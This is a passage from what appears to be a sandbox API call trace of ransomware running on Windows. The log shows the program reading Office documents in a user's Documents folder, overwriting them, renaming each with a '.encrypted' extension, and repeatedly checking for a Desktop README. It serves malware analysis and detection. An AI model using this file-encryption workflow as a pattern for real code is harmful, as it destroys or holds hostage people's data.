lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx", lpFilePart=0x0) returned 0x36 [0152.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vzbtjtsh2.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.669] GetFileType (hFile=0x4d0) returned 0x1 [0152.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.669] GetFileType (hFile=0x4d0) returned 0x1 [0152.669] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x160fc [0152.670] ReadFile (in: hFile=0x4d0, lpBuffer=0x3bf07a8, nNumberOfBytesToRead=0x160fc, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x3bf07a8*, lpNumberOfBytesRead=0x2ee894*=0x160fc, lpOverlapped=0x0) returned 1 [0152.672] CloseHandle (hObject=0x4d0) returned 1 [0152.691] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.691] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.691] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx", lpFilePart=0x0) returned 0x36 [0152.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vzbtjtsh2.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.692] GetFileType (hFile=0x4d0) returned 0x1 [0152.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.692] GetFileType (hFile=0x4d0) returned 0x1 [0152.692] WriteFile (in: hFile=0x4d0, lpBuffer=0x3c5ece0*, nNumberOfBytesToWrite=0x16100, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x3c5ece0*, lpNumberOfBytesWritten=0x2ee884*=0x16100, lpOverlapped=0x0) returned 1 [0152.694] CloseHandle (hObject=0x4d0) returned 1 [0152.696] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx", lpFilePart=0x0) returned 0x36 [0152.696] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx.encrypted", lpFilePart=0x0) returned 0x40 [0152.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.696] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vzbtjtsh2.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a0ac50, ftCreationTime.dwHighDateTime=0x1d5bbf6, ftLastAccessTime.dwLowDateTime=0x667b4790, ftLastAccessTime.dwHighDateTime=0x1d58be3, ftLastWriteTime.dwLowDateTime=0x41fa35c0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x16100)) returned 1 [0152.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.696] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vzbtjtsh2.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vzbtjtsh2.xlsx.encrypted")) returned 1 [0152.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx", lpFilePart=0x0) returned 0x36 [0152.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wkiortbvm.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.698] GetFileType (hFile=0x4d0) returned 0x1 [0152.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.698] GetFileType (hFile=0x4d0) returned 0x1 [0152.698] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x18b4e [0152.698] ReadFile (in: hFile=0x4d0, lpBuffer=0x3c74e00, nNumberOfBytesToRead=0x18b4e, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x3c74e00*, lpNumberOfBytesRead=0x2ee894*=0x18b4e, lpOverlapped=0x0) returned 1 [0152.701] CloseHandle (hObject=0x4d0) returned 1 [0152.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.720] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx", lpFilePart=0x0) returned 0x36 [0152.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wkiortbvm.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.721] GetFileType (hFile=0x4d0) returned 0x1 [0152.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.721] GetFileType (hFile=0x4d0) returned 0x1 [0152.721] WriteFile (in: hFile=0x4d0, lpBuffer=0x3cf06d0*, nNumberOfBytesToWrite=0x18b50, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x3cf06d0*, lpNumberOfBytesWritten=0x2ee884*=0x18b50, lpOverlapped=0x0) returned 1 [0152.724] CloseHandle (hObject=0x4d0) returned 1 [0152.725] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx", lpFilePart=0x0) returned 0x36 [0152.725] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx.encrypted", lpFilePart=0x0) returned 0x40 [0152.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.725] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wkiortbvm.docx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x651eff10, ftCreationTime.dwHighDateTime=0x1d5e58c, ftLastAccessTime.dwLowDateTime=0x96b16bc0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x41fef880, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x18b50)) returned 1 [0152.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.725] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wkiortbvm.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wkIoRTbVM.docx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wkiortbvm.docx.encrypted")) returned 1 [0152.727] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx", lpFilePart=0x0) returned 0x3e [0152.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x5fh3vei-d94zoqnp.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.727] GetFileType (hFile=0x4d0) returned 0x1 [0152.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.727] GetFileType (hFile=0x4d0) returned 0x1 [0152.727] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0xa694 [0152.727] ReadFile (in: hFile=0x4d0, lpBuffer=0x23fa94c, nNumberOfBytesToRead=0xa694, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x23fa94c*, lpNumberOfBytesRead=0x2ee894*=0xa694, lpOverlapped=0x0) returned 1 [0152.729] CloseHandle (hObject=0x4d0) returned 1 [0152.745] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.745] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.745] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx", lpFilePart=0x0) returned 0x3e [0152.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x5fh3vei-d94zoqnp.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.747] GetFileType (hFile=0x4d0) returned 0x1 [0152.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.747] GetFileType (hFile=0x4d0) returned 0x1 [0152.747] WriteFile (in: hFile=0x4d0, lpBuffer=0x2282518*, nNumberOfBytesToWrite=0xa6a0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x2282518*, lpNumberOfBytesWritten=0x2ee884*=0xa6a0, lpOverlapped=0x0) returned 1 [0152.748] CloseHandle (hObject=0x4d0) returned 1 [0152.749] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx", lpFilePart=0x0) returned 0x3e [0152.749] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx.encrypted", lpFilePart=0x0) returned 0x48 [0152.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.749] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x5fh3vei-d94zoqnp.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69c17d40, ftCreationTime.dwHighDateTime=0x1d5e127, ftLastAccessTime.dwLowDateTime=0xd081d6c0, ftLastAccessTime.dwHighDateTime=0x1d5e78e, ftLastWriteTime.dwLowDateTime=0x4203bb40, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xa6a0)) returned 1 [0152.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.749] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x5fh3vei-d94zoqnp.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X5Fh3VEi-d94zoqNP.pptx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x5fh3vei-d94zoqnp.pptx.encrypted")) returned 1 [0152.752] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc", lpFilePart=0x0) returned 0x36 [0152.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zxmgtonw7b.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.756] GetFileType (hFile=0x4d0) returned 0x1 [0152.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.756] GetFileType (hFile=0x4d0) returned 0x1 [0152.756] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x1233 [0152.756] ReadFile (in: hFile=0x4d0, lpBuffer=0x228d100, nNumberOfBytesToRead=0x1233, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x228d100*, lpNumberOfBytesRead=0x2ee894*=0x1233, lpOverlapped=0x0) returned 1 [0152.757] CloseHandle (hObject=0x4d0) returned 1 [0152.797] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.797] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.798] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc", lpFilePart=0x0) returned 0x36 [0152.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.798] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zxmgtonw7b.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.799] GetFileType (hFile=0x4d0) returned 0x1 [0152.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.799] GetFileType (hFile=0x4d0) returned 0x1 [0152.799] WriteFile (in: hFile=0x4d0, lpBuffer=0x22dfb4c*, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x22dfb4c*, lpNumberOfBytesWritten=0x2ee884*=0x1240, lpOverlapped=0x0) returned 1 [0152.800] CloseHandle (hObject=0x4d0) returned 1 [0152.801] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc", lpFilePart=0x0) returned 0x36 [0152.801] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc.encrypted", lpFilePart=0x0) returned 0x40 [0152.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.801] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zxmgtonw7b.doc"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa389e780, ftCreationTime.dwHighDateTime=0x1d5dc61, ftLastAccessTime.dwLowDateTime=0xc6cbf380, ftLastAccessTime.dwHighDateTime=0x1d5da88, ftLastWriteTime.dwLowDateTime=0x420adf60, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1240)) returned 1 [0152.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.801] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zxmgtonw7b.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZxmGTONw7B.doc.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zxmgtonw7b.doc.encrypted")) returned 1 [0152.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0152.802] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT", lpFilePart=0x0) returned 0x3a [0152.802] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\", lpFilePart=0x0) returned 0x3b [0152.802] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DDkKzEBB5Hx30VX7FT\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc9239a0, ftCreationTime.dwHighDateTime=0x1d5e668, ftLastAccessTime.dwLowDateTime=0x58812d0, ftLastAccessTime.dwHighDateTime=0x1d5e69f, ftLastWriteTime.dwLowDateTime=0x58812d0, ftLastWriteTime.dwHighDateTime=0x1d5e69f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94e88f0 [0152.805] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc9239a0, ftCreationTime.dwHighDateTime=0x1d5e668, ftLastAccessTime.dwLowDateTime=0x58812d0, ftLastAccessTime.dwHighDateTime=0x1d5e69f, ftLastWriteTime.dwLowDateTime=0x58812d0, ftLastWriteTime.dwHighDateTime=0x1d5e69f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.805] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67e4570, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0x4dd1e620, ftLastAccessTime.dwHighDateTime=0x1d5e32e, ftLastWriteTime.dwLowDateTime=0x4dd1e620, ftLastWriteTime.dwHighDateTime=0x1d5e32e, nFileSizeHigh=0x0, nFileSizeLow=0xb702, dwReserved0=0x0, dwReserved1=0x0, cFileName="3UL9aHsN4B.pptx", cAlternateFileName="3UL9AH~1.PPT")) returned 1 [0152.805] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ab13c30, ftCreationTime.dwHighDateTime=0x1d5da90, ftLastAccessTime.dwLowDateTime=0x4305ce40, ftLastAccessTime.dwHighDateTime=0x1d5da15, ftLastWriteTime.dwLowDateTime=0x4305ce40, ftLastWriteTime.dwHighDateTime=0x1d5da15, nFileSizeHigh=0x0, nFileSizeLow=0x14e73, dwReserved0=0x0, dwReserved1=0x0, cFileName="439h_isYEVctUB zXEr.ods", cAlternateFileName="439H_I~1.ODS")) returned 1 [0152.805] FindNextFileW (in: hFindFile=0x94e88f0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b7893a0, ftCreationTime.dwHighDateTime=0x1d5e30a, ftLastAccessTime.dwLowDateTime=0x83facaa0, ftLastAccessTime.dwHighDateTime=0x1d5e059, ftLastWriteTime.dwLowDateTime=0x83facaa0, ftLastWriteTime.dwHighDateTime=0x1d5e059, nFileSizeHigh=0x0, nFileSizeLow=0x13cf7, dwReserved0=0x0, dwReserved1=0x0, 